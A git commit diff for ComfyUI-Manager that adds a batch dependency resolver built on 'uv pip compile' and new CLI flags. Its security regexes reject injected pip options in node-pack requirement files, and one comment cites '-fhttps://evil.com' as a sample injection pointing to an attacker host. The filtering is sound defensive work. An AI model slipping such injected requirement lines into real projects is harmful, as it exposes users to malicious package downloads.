feat(deps): add unified dependency resolver with uv pip compile

Add UnifiedDepResolver that batch-resolves all custom node pack
dependencies via uv pip compile, replacing per-node pip installs.

Core features:
- Collect, sanitize, and compile requirements from all node packs
- Input validation with regex-based sanitization and blacklist/override support
- Conflict detection with per-node-pack attribution output
- CollectedDeps.sources stores (pack_path, pkg_spec) tuples for attribution
- Startup integration via prestartup_script.py with fallback to legacy path
- --uv-compile flag on 8 CLI commands: uv-compile, install, reinstall,
  update, fix, restore-snapshot, restore-dependencies, install-deps

Testing:
- 148 unit tests (mock-based) covering all resolver logic
- 12 E2E pytest tests using ltdrdata's dedicated conflict test packs
- E2E environment setup scripts (setup, start, stop)
- Supply-chain safety policy: only verified authors' packs in E2E

Documentation:
- PRD and DESIGN specs for the resolver
- EN/KO cm-cli user docs updated for all new commands
- Test documentation and environment setup guide

Bump version to 4.1b3.
This commit is contained in:
Dr.Lt.Data 2026-03-10 23:37:57 +09:00
parent 0d88a3874d
commit 11c5f0ad90
18 changed files with 5382 additions and 28 deletions

4
.gitignore vendored
View File

@ -21,4 +21,6 @@ check2.sh
build
dist
*.egg-info
.env
.env
.claude
test_venv

View File

@ -656,6 +656,14 @@ def install(
help="Skip installing any Python dependencies",
),
] = False,
uv_compile: Annotated[
Optional[bool],
typer.Option(
"--uv-compile",
show_default=False,
help="After installing, batch-resolve all dependencies via uv pip compile",
),
] = False,
user_directory: str = typer.Option(
None,
help="user directory"
@ -667,11 +675,34 @@ def install(
):
cmd_ctx.set_user_directory(user_directory)
cmd_ctx.set_channel_mode(channel, mode)
cmd_ctx.set_no_deps(no_deps)
if uv_compile and no_deps:
print("[bold red]--uv-compile and --no-deps are mutually exclusive.[/bold red]")
raise typer.Exit(1)
if uv_compile:
cmd_ctx.set_no_deps(True)
else:
cmd_ctx.set_no_deps(no_deps)
pip_fixer = manager_util.PIPFixer(manager_util.get_installed_packages(), comfy_path, context.manager_files_path)
for_each_nodes(nodes, act=install_node, exit_on_fail=exit_on_fail)
pip_fixer.fix_broken()
if uv_compile:
try:
_run_unified_resolve()
except ImportError as e:
print(f"[bold red]Failed to import unified_dep_resolver: {e}[/bold red]")
raise typer.Exit(1)
except typer.Exit:
raise
except Exception as e:
print(f"[bold red]Batch resolution failed: {e}[/bold red]")
raise typer.Exit(1)
finally:
pip_fixer.fix_broken()
else:
pip_fixer.fix_broken()
@app.command(help="Reinstall custom nodes")
@ -698,6 +729,14 @@ def reinstall(
help="Skip installing any Python dependencies",
),
] = False,
uv_compile: Annotated[
Optional[bool],
typer.Option(
"--uv-compile",
show_default=False,
help="After reinstalling, batch-resolve all dependencies via uv pip compile",
),
] = False,
user_directory: str = typer.Option(
None,
help="user directory"
@ -705,11 +744,34 @@ def reinstall(
):
cmd_ctx.set_user_directory(user_directory)
cmd_ctx.set_channel_mode(channel, mode)
cmd_ctx.set_no_deps(no_deps)
if uv_compile and no_deps:
print("[bold red]--uv-compile and --no-deps are mutually exclusive.[/bold red]")
raise typer.Exit(1)
if uv_compile:
cmd_ctx.set_no_deps(True)
else:
cmd_ctx.set_no_deps(no_deps)
pip_fixer = manager_util.PIPFixer(manager_util.get_installed_packages(), comfy_path, context.manager_files_path)
for_each_nodes(nodes, act=reinstall_node)
pip_fixer.fix_broken()
if uv_compile:
try:
_run_unified_resolve()
except ImportError as e:
print(f"[bold red]Failed to import unified_dep_resolver: {e}[/bold red]")
raise typer.Exit(1)
except typer.Exit:
raise
except Exception as e:
print(f"[bold red]Batch resolution failed: {e}[/bold red]")
raise typer.Exit(1)
finally:
pip_fixer.fix_broken()
else:
pip_fixer.fix_broken()
@app.command(help="Uninstall custom nodes")
@ -754,10 +816,21 @@ def update(
None,
help="user directory"
),
uv_compile: Annotated[
Optional[bool],
typer.Option(
"--uv-compile",
show_default=False,
help="After updating, batch-resolve all dependencies via uv pip compile",
),
] = False,
):
cmd_ctx.set_user_directory(user_directory)
cmd_ctx.set_channel_mode(channel, mode)
if uv_compile:
cmd_ctx.set_no_deps(True)
if 'all' in nodes:
asyncio.run(auto_save_snapshot())
@ -769,7 +842,22 @@ def update(
break
update_parallel(nodes)
pip_fixer.fix_broken()
if uv_compile:
try:
_run_unified_resolve()
except ImportError as e:
print(f"[bold red]Failed to import unified_dep_resolver: {e}[/bold red]")
raise typer.Exit(1)
except typer.Exit:
raise
except Exception as e:
print(f"[bold red]Batch resolution failed: {e}[/bold red]")
raise typer.Exit(1)
finally:
pip_fixer.fix_broken()
else:
pip_fixer.fix_broken()
@app.command(help="Disable custom nodes")
@ -855,16 +943,42 @@ def fix(
None,
help="user directory"
),
uv_compile: Annotated[
Optional[bool],
typer.Option(
"--uv-compile",
show_default=False,
help="After fixing, batch-resolve all dependencies via uv pip compile",
),
] = False,
):
cmd_ctx.set_user_directory(user_directory)
cmd_ctx.set_channel_mode(channel, mode)
if uv_compile:
cmd_ctx.set_no_deps(True)
if 'all' in nodes:
asyncio.run(auto_save_snapshot())
pip_fixer = manager_util.PIPFixer(manager_util.get_installed_packages(), comfy_path, context.manager_files_path)
for_each_nodes(nodes, fix_node, allow_all=True)
pip_fixer.fix_broken()
if uv_compile:
try:
_run_unified_resolve()
except ImportError as e:
print(f"[bold red]Failed to import unified_dep_resolver: {e}[/bold red]")
raise typer.Exit(1)
except typer.Exit:
raise
except Exception as e:
print(f"[bold red]Batch resolution failed: {e}[/bold red]")
raise typer.Exit(1)
finally:
pip_fixer.fix_broken()
else:
pip_fixer.fix_broken()
@app.command("show-versions", help="Show all available versions of the node")
@ -1061,7 +1175,7 @@ def save_snapshot(
@app.command("restore-snapshot", help="Restore snapshot from snapshot file")
def restore_snapshot(
snapshot_name: str,
snapshot_name: str,
pip_non_url: Optional[bool] = typer.Option(
default=None,
show_default=False,
@ -1087,13 +1201,24 @@ def restore_snapshot(
restore_to: Optional[str] = typer.Option(
None,
help="Manually specify the installation path for the custom node. Ignore user directory."
)
),
uv_compile: Annotated[
Optional[bool],
typer.Option(
"--uv-compile",
show_default=False,
help="After restoring, batch-resolve all dependencies via uv pip compile",
),
] = False,
):
cmd_ctx.set_user_directory(user_directory)
if restore_to:
cmd_ctx.update_custom_nodes_dir(restore_to)
if uv_compile:
cmd_ctx.set_no_deps(True)
extras = []
if pip_non_url:
extras.append('--pip-non-url')
@ -1120,8 +1245,25 @@ def restore_snapshot(
except Exception:
print("[bold red]ERROR: Failed to restore snapshot.[/bold red]")
traceback.print_exc()
if uv_compile:
pip_fixer.fix_broken()
raise typer.Exit(code=1)
pip_fixer.fix_broken()
if uv_compile:
try:
_run_unified_resolve()
except ImportError as e:
print(f"[bold red]Failed to import unified_dep_resolver: {e}[/bold red]")
raise typer.Exit(1)
except typer.Exit:
raise
except Exception as e:
print(f"[bold red]Batch resolution failed: {e}[/bold red]")
raise typer.Exit(1)
finally:
pip_fixer.fix_broken()
else:
pip_fixer.fix_broken()
@app.command(
@ -1131,10 +1273,21 @@ def restore_dependencies(
user_directory: str = typer.Option(
None,
help="user directory"
)
),
uv_compile: Annotated[
Optional[bool],
typer.Option(
"--uv-compile",
show_default=False,
help="After restoring, batch-resolve all dependencies via uv pip compile",
),
] = False,
):
cmd_ctx.set_user_directory(user_directory)
if uv_compile:
cmd_ctx.set_no_deps(True)
node_paths = []
for base_path in cmd_ctx.get_custom_nodes_paths():
@ -1150,9 +1303,24 @@ def restore_dependencies(
for x in node_paths:
print("----------------------------------------------------------------------------------------------------")
print(f"Restoring [{i}/{total}]: {x}")
unified_manager.execute_install_script('', x, instant_execution=True)
unified_manager.execute_install_script('', x, instant_execution=True, no_deps=bool(uv_compile))
i += 1
pip_fixer.fix_broken()
if uv_compile:
try:
_run_unified_resolve()
except ImportError as e:
print(f"[bold red]Failed to import unified_dep_resolver: {e}[/bold red]")
raise typer.Exit(1)
except typer.Exit:
raise
except Exception as e:
print(f"[bold red]Batch resolution failed: {e}[/bold red]")
raise typer.Exit(1)
finally:
pip_fixer.fix_broken()
else:
pip_fixer.fix_broken()
@app.command(
@ -1193,9 +1361,21 @@ def install_deps(
None,
help="user directory"
),
uv_compile: Annotated[
Optional[bool],
typer.Option(
"--uv-compile",
show_default=False,
help="After installing, batch-resolve all dependencies via uv pip compile",
),
] = False,
):
cmd_ctx.set_user_directory(user_directory)
cmd_ctx.set_channel_mode(channel, mode)
if uv_compile:
cmd_ctx.set_no_deps(True)
asyncio.run(auto_save_snapshot())
if not os.path.exists(deps):
@ -1215,14 +1395,114 @@ def install_deps(
if state == 'installed':
continue
elif state == 'not-installed':
asyncio.run(core.gitclone_install(k, instant_execution=True))
asyncio.run(core.gitclone_install(k, instant_execution=True, no_deps=bool(uv_compile)))
else: # disabled
core.gitclone_set_active([k], False)
pip_fixer.fix_broken()
if uv_compile:
try:
_run_unified_resolve()
except ImportError as e:
print(f"[bold red]Failed to import unified_dep_resolver: {e}[/bold red]")
raise typer.Exit(1)
except typer.Exit:
raise
except Exception as e:
print(f"[bold red]Batch resolution failed: {e}[/bold red]")
raise typer.Exit(1)
finally:
pip_fixer.fix_broken()
else:
pip_fixer.fix_broken()
print("Dependency installation and activation complete.")
def _run_unified_resolve():
    """Shared logic for unified batch dependency resolution.

    Collects all installed node-pack paths, builds a ``UnifiedDepResolver``
    configured from ``cm_global`` pip policies, and runs the full
    resolve-and-install pipeline.  On failure, prints per-node-pack
    attribution for conflicting packages and exits with code 1.
    """
    # Imported lazily: only commands that opt into --uv-compile pay the
    # import cost, and an ImportError surfaces to the calling command.
    from comfyui_manager.common.unified_dep_resolver import (
        UnifiedDepResolver,
        UvNotAvailableError,
        collect_base_requirements,
        collect_node_pack_paths,
    )

    node_pack_paths = collect_node_pack_paths(cmd_ctx.get_custom_nodes_paths())
    if not node_pack_paths:
        print("[bold yellow]No custom node packs found.[/bold yellow]")
        return

    print(f"Resolving dependencies for {len(node_pack_paths)} node pack(s)...")

    resolver = UnifiedDepResolver(
        node_pack_paths=node_pack_paths,
        base_requirements=collect_base_requirements(comfy_path),
        blacklist=cm_global.pip_blacklist,
        overrides=cm_global.pip_overrides,
        downgrade_blacklist=cm_global.pip_downgrade_blacklist,
    )

    try:
        result = resolver.resolve_and_install()
    except UvNotAvailableError:
        # uv missing entirely — actionable message instead of a traceback.
        print("[bold red]uv is not available. Install uv to use this feature.[/bold red]")
        raise typer.Exit(1)

    if result.success:
        collected = result.collected
        if collected:
            print(
                f"[bold green]Resolved {len(collected.requirements)} deps "
                f"from {len(collected.sources)} source(s) "
                f"(skipped {len(collected.skipped)}).[/bold green]"
            )
        else:
            print("[bold green]Resolution complete (no deps needed).[/bold green]")
    else:
        print(f"[bold red]Resolution failed: {result.error}[/bold red]")
        # Show which node packs requested each conflicting package.
        if result.lockfile and result.lockfile.conflicts and result.collected:
            # Normalise conflict text so package-name matching is
            # case- and hyphen-insensitive.
            conflict_text = "\n".join(result.lockfile.conflicts).lower().replace("-", "_")
            attributed = {
                pkg: reqs
                for pkg, reqs in result.collected.sources.items()
                if re.search(r'(?<![a-z0-9_])' + re.escape(pkg.lower().replace("-", "_")) + r'(?![a-z0-9_])', conflict_text)
            }
            if attributed:
                print("[bold yellow]Conflicting packages (by node pack):[/bold yellow]")
                for pkg_name, requesters in sorted(attributed.items()):
                    print(f" [yellow]{pkg_name}[/yellow]:")
                    for pack_path, pkg_spec in requesters:
                        print(f" {os.path.basename(pack_path)}{pkg_spec}")
        raise typer.Exit(1)
@app.command(
    "uv-compile",
    help="Batch-resolve and install all custom node dependencies via uv pip compile.",
)
def unified_uv_compile(
    user_directory: str = typer.Option(
        None,
        help="user directory"
    ),
):
    """Standalone CLI entry point for unified batch dependency resolution."""
    cmd_ctx.set_user_directory(user_directory)
    pip_fixer = manager_util.PIPFixer(manager_util.get_installed_packages(), comfy_path, context.manager_files_path)
    try:
        _run_unified_resolve()
    except ImportError as e:
        # Resolver module missing or broken — report instead of a traceback.
        print(f"[bold red]Failed to import unified_dep_resolver: {e}[/bold red]")
        raise typer.Exit(1)
    except typer.Exit:
        # Preserve exit codes raised inside _run_unified_resolve().
        raise
    except Exception as e:
        print(f"[bold red]Unexpected error: {e}[/bold red]")
        raise typer.Exit(1)
    finally:
        # Always repair known-broken pip state, even on failure.
        pip_fixer.fix_broken()
@app.command(help="Clear reserved startup action in ComfyUI-Manager")
def clear():
    """Cancel any reserved startup action (delegates to ``cancel()``)."""
    cancel()

View File

@ -25,6 +25,7 @@ comfyui_manager_path = os.path.abspath(os.path.join(os.path.dirname(__file__), '
cache_dir = os.path.join(comfyui_manager_path, '.cache') # This path is also updated together in **manager_core.update_user_directory**.
use_uv = False
use_unified_resolver = False
bypass_ssl = False
def is_manager_pip_package():

View File

@ -0,0 +1,704 @@
"""Unified Dependency Resolver for ComfyUI Manager.
Resolves and installs all node-pack dependencies at once using ``uv pip compile``
followed by ``uv pip install -r``, replacing per-node-pack ``pip install`` calls.
Responsibility scope
--------------------
- Dependency collection, resolution, and installation **only**.
- ``install.py`` execution and ``PIPFixer`` calls are the caller's responsibility.
See Also
--------
- docs/dev/PRD-unified-dependency-resolver.md
- docs/dev/DESIGN-unified-dependency-resolver.md
"""
from __future__ import annotations
import logging
import os
import re
import shutil
import subprocess
import sys
import tempfile
import time
from collections import defaultdict
from dataclasses import dataclass, field
from . import manager_util
logger = logging.getLogger("ComfyUI-Manager")
# ---------------------------------------------------------------------------
# Exceptions
# ---------------------------------------------------------------------------
class UvNotAvailableError(RuntimeError):
    """Raised when neither ``python -m uv`` nor standalone ``uv`` is found."""


# ---------------------------------------------------------------------------
# Data classes
# ---------------------------------------------------------------------------
@dataclass
class PackageRequirement:
    """Individual package dependency."""

    name: str    # Normalised package name
    spec: str    # Original spec string (e.g. ``torch>=2.0``)
    source: str  # Absolute path of the source node pack


@dataclass
class CollectedDeps:
    """Aggregated dependency collection result."""

    requirements: list[PackageRequirement] = field(default_factory=list)
    # (line, reason) pairs for lines rejected during collection.
    skipped: list[tuple[str, str]] = field(default_factory=list)
    # pkg_name -> [(pack_path, pkg_spec), ...] — tracks which node packs
    # request each package (used for conflict attribution in the CLI).
    sources: dict[str, list[tuple[str, str]]] = field(default_factory=dict)
    # Deduplicated --index-url / --extra-index-url values from node packs.
    extra_index_urls: list[str] = field(default_factory=list)


@dataclass
class LockfileResult:
    """Result of ``uv pip compile``."""

    success: bool
    lockfile_path: str | None = None  # Pinned requirements path on success
    conflicts: list[str] = field(default_factory=list)  # Human-readable conflict lines
    stderr: str = ""


@dataclass
class InstallResult:
    """Result of ``uv pip install -r`` (atomic: all-or-nothing)."""

    success: bool
    installed: list[str] = field(default_factory=list)
    skipped: list[str] = field(default_factory=list)
    stderr: str = ""


@dataclass
class ResolveResult:
    """Full pipeline result."""

    success: bool
    collected: CollectedDeps | None = None
    lockfile: LockfileResult | None = None
    install: InstallResult | None = None
    error: str | None = None
# ---------------------------------------------------------------------------
# Resolver
# ---------------------------------------------------------------------------

# Prefix for resolver temp directories (reaped by ``cleanup_stale_tmp``).
_TMP_PREFIX = "comfyui_resolver_"

# Security: reject dangerous requirement patterns at line start.
# NOTE: This regex is intentionally kept alongside _INLINE_DANGEROUS_OPTIONS
# because it covers ``@ file://`` via ``.*@\s*file://`` which relies on the
# ``^`` anchor. Both regexes share responsibility for option rejection:
# this one catches line-start patterns; _INLINE_DANGEROUS_OPTIONS catches
# options appearing after a package name.
_DANGEROUS_PATTERNS = re.compile(
    r'^(-r\b|--requirement\b|-e\b|--editable\b|-c\b|--constraint\b'
    r'|--find-links\b|-f\b|.*@\s*file://)',
    re.IGNORECASE,
)

# Security: reject dangerous pip options appearing anywhere in the line
# (supplements the ^-anchored _DANGEROUS_PATTERNS which only catches line-start).
# The ``(?:^|\s)`` prefix prevents false positives on hyphenated package names
# (e.g. ``re-crypto``, ``package[extra-c]``) while still catching concatenated
# short-flag attacks like ``-fhttps://evil.com``.
_INLINE_DANGEROUS_OPTIONS = re.compile(
    r'(?:^|\s)(--find-links\b|--constraint\b|--requirement\b|--editable\b'
    r'|--trusted-host\b|--global-option\b|--install-option\b'
    r'|-f|-r|-e|-c)',
    re.IGNORECASE,
)

# Credential redaction in index URLs.
_CREDENTIAL_PATTERN = re.compile(r'://([^@]+)@')

# Version-spec parsing (same regex as existing ``is_blacklisted()``).
_VERSION_SPEC_PATTERN = re.compile(r'([^<>!~=]+)([<>!~=]=?)([^ ]*)')
def collect_node_pack_paths(custom_nodes_dirs: list[str]) -> list[str]:
    """Collect all installed node-pack directory paths.

    Parameters
    ----------
    custom_nodes_dirs:
        Base directories returned by ``folder_paths.get_folder_paths('custom_nodes')``.

    Returns
    -------
    list[str]
        Paths of node-pack directories (immediate subdirectories of each
        existing base; non-directory entries and missing bases are skipped).
    """
    return [
        candidate
        for base in custom_nodes_dirs
        if os.path.isdir(base)
        for candidate in (
            os.path.join(base, child) for child in os.listdir(base)
        )
        if os.path.isdir(candidate)
    ]
def collect_base_requirements(comfy_path: str) -> list[str]:
    """Read ComfyUI's own base requirements as constraint lines.

    Reads ``requirements.txt`` and ``manager_requirements.txt`` from
    *comfy_path*.  These are ComfyUI-level dependencies only — never read
    from node packs.

    Parameters
    ----------
    comfy_path:
        Root directory of the ComfyUI installation.

    Returns
    -------
    list[str]
        Non-empty, non-comment requirement lines (stripped).
    """
    collected: list[str] = []
    for filename in ("requirements.txt", "manager_requirements.txt"):
        candidate = os.path.join(comfy_path, filename)
        if not os.path.exists(candidate):
            continue
        with open(candidate, encoding="utf-8") as fh:
            for raw in fh:
                entry = raw.strip()
                if entry and not entry.startswith('#'):
                    collected.append(entry)
    return collected
class UnifiedDepResolver:
    """Unified dependency resolver.

    Resolves and installs all dependencies of (installed + new) node packs at
    once using *uv*.

    Parameters
    ----------
    node_pack_paths:
        Absolute paths of node-pack directories to consider.
    base_requirements:
        Lines from ComfyUI's own ``requirements.txt`` (used as constraints).
    blacklist:
        Package names to skip unconditionally (default: ``cm_global.pip_blacklist``).
    overrides:
        Package-name remapping dict (default: ``cm_global.pip_overrides``).
    downgrade_blacklist:
        Packages whose installed versions must not be downgraded
        (default: ``cm_global.pip_downgrade_blacklist``).
    """

    def __init__(
        self,
        node_pack_paths: list[str],
        base_requirements: list[str] | None = None,
        blacklist: set[str] | None = None,
        overrides: dict[str, str] | None = None,
        downgrade_blacklist: list[str] | None = None,
    ) -> None:
        self.node_pack_paths = node_pack_paths
        self.base_requirements = base_requirements or []
        # ``is not None`` checks preserve deliberately-empty containers.
        self.blacklist: set[str] = blacklist if blacklist is not None else set()
        self.overrides: dict[str, str] = overrides if overrides is not None else {}
        self.downgrade_blacklist: list[str] = (
            downgrade_blacklist if downgrade_blacklist is not None else []
        )
# ------------------------------------------------------------------
# Public API
# ------------------------------------------------------------------
def resolve_and_install(self) -> ResolveResult:
    """Execute the full pipeline: cleanup → collect → compile → install.

    Returns a ``ResolveResult``; never raises except ``UvNotAvailableError``
    (re-raised so callers can show a dedicated message).  The compile temp
    directory is always removed on exit once known.
    """
    self.cleanup_stale_tmp()
    tmp_dir: str | None = None
    try:
        # 1. Collect
        collected = self.collect_requirements()
        if not collected.requirements:
            logger.info("[UnifiedDepResolver] No dependencies to resolve")
            return ResolveResult(success=True, collected=collected)
        logger.info(
            "[UnifiedDepResolver] Collected %d deps from %d sources (skipped %d)",
            len(collected.requirements),
            len(collected.sources),
            len(collected.skipped),
        )
        # 2. Compile
        lockfile = self.compile_lockfile(collected)
        if not lockfile.success:
            return ResolveResult(
                success=False,
                collected=collected,
                lockfile=lockfile,
                error=f"compile failed: {'; '.join(lockfile.conflicts)}",
            )
        # tmp_dir is the parent of lockfile_path
        tmp_dir = os.path.dirname(lockfile.lockfile_path)  # type: ignore[arg-type]
        # 3. Install
        install = self.install_from_lockfile(lockfile.lockfile_path)  # type: ignore[arg-type]
        return ResolveResult(
            success=install.success,
            collected=collected,
            lockfile=lockfile,
            install=install,
            error=install.stderr if not install.success else None,
        )
    except UvNotAvailableError:
        # Propagate so the CLI can print an actionable message.
        raise
    except Exception as exc:
        # Defensive: any other failure is reported, not raised.
        logger.warning("[UnifiedDepResolver] unexpected error: %s", exc)
        return ResolveResult(success=False, error=str(exc))
    finally:
        if tmp_dir and os.path.isdir(tmp_dir):
            shutil.rmtree(tmp_dir, ignore_errors=True)
# ------------------------------------------------------------------
# Step 1: collect
# ------------------------------------------------------------------
def collect_requirements(self) -> CollectedDeps:
    """Collect dependencies from all node packs.

    Walks every enabled node pack's ``requirements.txt``, applying
    security filtering, overrides, and blacklists.  Pure collection —
    nothing is installed here.
    """
    requirements: list[PackageRequirement] = []
    skipped: list[tuple[str, str]] = []
    sources: defaultdict[str, list[tuple[str, str]]] = defaultdict(list)
    extra_index_urls: list[str] = []
    # Snapshot installed packages once to avoid repeated subprocess calls.
    # Skip when downgrade_blacklist is empty (the common default).
    installed_snapshot = (
        manager_util.get_installed_packages()
        if self.downgrade_blacklist else {}
    )
    for pack_path in self.node_pack_paths:
        # Exclude disabled node packs (directory-based mechanism).
        if self._is_disabled_path(pack_path):
            continue
        req_file = os.path.join(pack_path, "requirements.txt")
        if not os.path.exists(req_file):
            continue
        for raw_line in self._read_requirements(req_file):
            # Strip inline comments before any validation.
            # NOTE(review): this also truncates '#' inside URL fragments
            # (e.g. ``#egg=``) — confirm that is acceptable.
            line = raw_line.split('#')[0].strip()
            if not line:
                continue
            # 0. Security: reject dangerous patterns
            if _DANGEROUS_PATTERNS.match(line):
                skipped.append((line, f"rejected: dangerous pattern in {pack_path}"))
                logger.warning(
                    "[UnifiedDepResolver] rejected dangerous line: '%s' from %s",
                    line, pack_path,
                )
                continue
            # 1. Separate --index-url / --extra-index-url handling
            #    (before path separator check, because URLs contain '/')
            #    URLs are staged but NOT committed until the line passes
            #    all validation (prevents URL injection from rejected lines).
            pending_urls: list[str] = []
            if '--index-url' in line or '--extra-index-url' in line:
                pkg_spec, pending_urls = self._split_index_url(line)
                line = pkg_spec
                if not line:
                    # Standalone option line (no package prefix) — safe
                    extra_index_urls.extend(pending_urls)
                    continue
            # 1b. Reject dangerous pip options appearing after package name
            #     (--index-url/--extra-index-url already extracted above)
            if _INLINE_DANGEROUS_OPTIONS.search(line):
                skipped.append((line, f"rejected: inline pip option in {pack_path}"))
                logger.warning(
                    "[UnifiedDepResolver] rejected inline pip option: '%s' from %s",
                    line, pack_path,
                )
                continue
            # Reject path separators in package name portion
            pkg_name_part = re.split(r'[><=!~;]', line)[0]
            if '/' in pkg_name_part or '\\' in pkg_name_part:
                skipped.append((line, "rejected: path separator in package name"))
                logger.warning(
                    "[UnifiedDepResolver] rejected path separator: '%s' from %s",
                    line, pack_path,
                )
                continue
            # 2. Remap package name
            pkg_spec = self._remap_package(line)
            # 3. Extract normalised name
            pkg_name = self._extract_package_name(pkg_spec)
            # 4. Blacklist check
            if pkg_name in self.blacklist:
                skipped.append((pkg_spec, "blacklisted"))
                continue
            # 5. Downgrade blacklist check
            if self._is_downgrade_blacklisted(pkg_name, pkg_spec,
                                              installed_snapshot):
                skipped.append((pkg_spec, "downgrade blacklisted"))
                continue
            # 6. Collect (no dedup — uv handles resolution)
            requirements.append(
                PackageRequirement(name=pkg_name, spec=pkg_spec, source=pack_path)
            )
            sources[pkg_name].append((pack_path, pkg_spec))
            # Commit staged index URLs only after all validation passed.
            if pending_urls:
                extra_index_urls.extend(pending_urls)
    return CollectedDeps(
        requirements=requirements,
        skipped=skipped,
        sources=dict(sources),
        extra_index_urls=list(set(extra_index_urls)),
    )
# ------------------------------------------------------------------
# Step 2: compile
# ------------------------------------------------------------------
def compile_lockfile(self, deps: CollectedDeps) -> LockfileResult:
    """Generate pinned requirements via ``uv pip compile``.

    Writes collected specs (and base constraints) into a fresh temp dir,
    then runs ``uv pip compile`` targeting the current interpreter.  On
    success the temp dir is kept (the caller installs from it and cleans
    it up); on a raised error it is removed here.  Failure *returns*
    (timeout, conflicts) leave the dir for ``cleanup_stale_tmp`` to reap.
    """
    tmp_dir = tempfile.mkdtemp(prefix=_TMP_PREFIX)
    try:
        # Write temp requirements
        tmp_req = os.path.join(tmp_dir, "input-requirements.txt")
        with open(tmp_req, "w", encoding="utf-8") as fh:
            for req in deps.requirements:
                fh.write(req.spec + "\n")
        # Write constraints (base dependencies)
        tmp_constraints: str | None = None
        if self.base_requirements:
            tmp_constraints = os.path.join(tmp_dir, "constraints.txt")
            with open(tmp_constraints, "w", encoding="utf-8") as fh:
                for line in self.base_requirements:
                    fh.write(line.strip() + "\n")
        lockfile_path = os.path.join(tmp_dir, "resolved-requirements.txt")
        cmd = self._get_uv_cmd() + [
            "pip", "compile",
            tmp_req,
            "--output-file", lockfile_path,
            "--python", sys.executable,
        ]
        if tmp_constraints:
            cmd += ["--constraint", tmp_constraints]
        for url in deps.extra_index_urls:
            # Log redacted so credentials never reach the log file.
            logger.info(
                "[UnifiedDepResolver] extra-index-url: %s",
                self._redact_url(url),
            )
            cmd += ["--extra-index-url", url]
        logger.info("[UnifiedDepResolver] running: %s", " ".join(
            self._redact_url(c) for c in cmd
        ))
        try:
            result = subprocess.run(
                cmd,
                capture_output=True,
                text=True,
                timeout=300,
            )
        except subprocess.TimeoutExpired:
            logger.warning("[UnifiedDepResolver] uv pip compile timed out (300s)")
            return LockfileResult(
                success=False,
                conflicts=["compile timeout exceeded (300s)"],
                stderr="TimeoutExpired",
            )
        if result.returncode != 0:
            conflicts = self._parse_conflicts(result.stderr)
            return LockfileResult(
                success=False,
                conflicts=conflicts,
                stderr=result.stderr,
            )
        if not os.path.exists(lockfile_path):
            # Defensive: uv returned 0 but produced no lockfile.
            return LockfileResult(
                success=False,
                conflicts=["lockfile not created despite success return code"],
                stderr=result.stderr,
            )
        return LockfileResult(success=True, lockfile_path=lockfile_path)
    except UvNotAvailableError:
        shutil.rmtree(tmp_dir, ignore_errors=True)
        raise
    except Exception:
        shutil.rmtree(tmp_dir, ignore_errors=True)
        raise
# ------------------------------------------------------------------
# Step 3: install
# ------------------------------------------------------------------
def install_from_lockfile(self, lockfile_path: str) -> InstallResult:
    """Install from pinned requirements (``uv pip install -r``).

    Do **not** use ``uv pip sync`` — it deletes packages not in the
    lockfile, risking removal of torch, ComfyUI deps, etc.
    """
    cmd = self._get_uv_cmd() + [
        "pip", "install",
        "--requirement", lockfile_path,
        "--python", sys.executable,
    ]
    logger.info("[UnifiedDepResolver] running: %s", " ".join(cmd))
    try:
        result = subprocess.run(
            cmd,
            capture_output=True,
            text=True,
            timeout=600,
        )
    except subprocess.TimeoutExpired:
        logger.warning("[UnifiedDepResolver] uv pip install timed out (600s)")
        return InstallResult(
            success=False,
            stderr="TimeoutExpired: install exceeded 600s",
        )
    installed, skipped_pkgs = self._parse_install_output(result)
    return InstallResult(
        success=result.returncode == 0,
        installed=installed,
        skipped=skipped_pkgs,
        # Keep stderr only on failure so success results stay small.
        stderr=result.stderr if result.returncode != 0 else "",
    )
# ------------------------------------------------------------------
# uv command resolution
# ------------------------------------------------------------------
def _get_uv_cmd(self) -> list[str]:
    """Determine the ``uv`` command to use.

    ``python_embeded`` spelling is intentional — matches the actual path
    name in the ComfyUI Windows distribution.

    Raises
    ------
    UvNotAvailableError
        If neither ``python -m uv`` nor a standalone ``uv`` binary works.
    """
    embedded = 'python_embeded' in sys.executable
    # 1. Try uv as a Python module
    try:
        test_cmd = (
            [sys.executable]
            + (['-s'] if embedded else [])
            + ['-m', 'uv', '--version']
        )
        subprocess.check_output(test_cmd, stderr=subprocess.DEVNULL, timeout=5)
        return [sys.executable] + (['-s'] if embedded else []) + ['-m', 'uv']
    except Exception:
        # Any failure (missing module, timeout) falls through to PATH lookup.
        pass
    # 2. Standalone uv executable
    if shutil.which('uv'):
        return ['uv']
    raise UvNotAvailableError("uv is not available")
# ------------------------------------------------------------------
# Helpers — collection
# ------------------------------------------------------------------
@staticmethod
def _is_disabled_path(path: str) -> bool:
"""Return ``True`` if *path* is within a ``.disabled`` directory."""
# New style: custom_nodes/.disabled/{name}
if '/.disabled/' in path or os.path.basename(os.path.dirname(path)) == '.disabled':
return True
# Old style: {name}.disabled suffix
if path.rstrip('/').endswith('.disabled'):
return True
return False
@staticmethod
def _read_requirements(filepath: str) -> list[str]:
    """Read requirements file using ``robust_readlines`` pattern.

    Delegates to ``manager_util.robust_readlines`` — presumably tolerant
    of odd encodings in third-party files; confirm against manager_util.
    """
    return manager_util.robust_readlines(filepath)
@staticmethod
def _split_index_url(line: str) -> tuple[str, list[str]]:
"""Split index-url options from a requirement line.
Handles lines with one or more ``--index-url`` / ``--extra-index-url``
options. Returns ``(package_spec, [url, ...])``.
Examples::
"torch --extra-index-url U1 --index-url U2"
("torch", ["U1", "U2"])
"--index-url URL"
("", ["URL"])
"""
urls: list[str] = []
remainder_tokens: list[str] = []
# Regex: match --extra-index-url or --index-url followed by its value
option_re = re.compile(
r'(--(?:extra-)?index-url)\s+(\S+)'
)
# Pattern for bare option flags without a URL value
bare_option_re = re.compile(r'^--(?:extra-)?index-url$')
last_end = 0
for m in option_re.finditer(line):
# Text before this option is part of the package spec
before = line[last_end:m.start()].strip()
if before:
remainder_tokens.append(before)
urls.append(m.group(2))
last_end = m.end()
# Trailing text after last option
trailing = line[last_end:].strip()
if trailing:
remainder_tokens.append(trailing)
# Strip any bare option flags that leaked into remainder tokens
# (e.g. "--index-url" with no URL value after it)
remainder_tokens = [
t for t in remainder_tokens if not bare_option_re.match(t)
]
pkg_spec = " ".join(remainder_tokens).strip()
return pkg_spec, urls
def _remap_package(self, pkg: str) -> str:
    """Apply ``pip_overrides`` remapping.

    Returns the override target when *pkg* has one (logging the swap);
    otherwise returns *pkg* unchanged.
    """
    try:
        remapped = self.overrides[pkg]
    except KeyError:
        return pkg
    logger.info("[UnifiedDepResolver] '%s' remapped to '%s'", pkg, remapped)
    return remapped
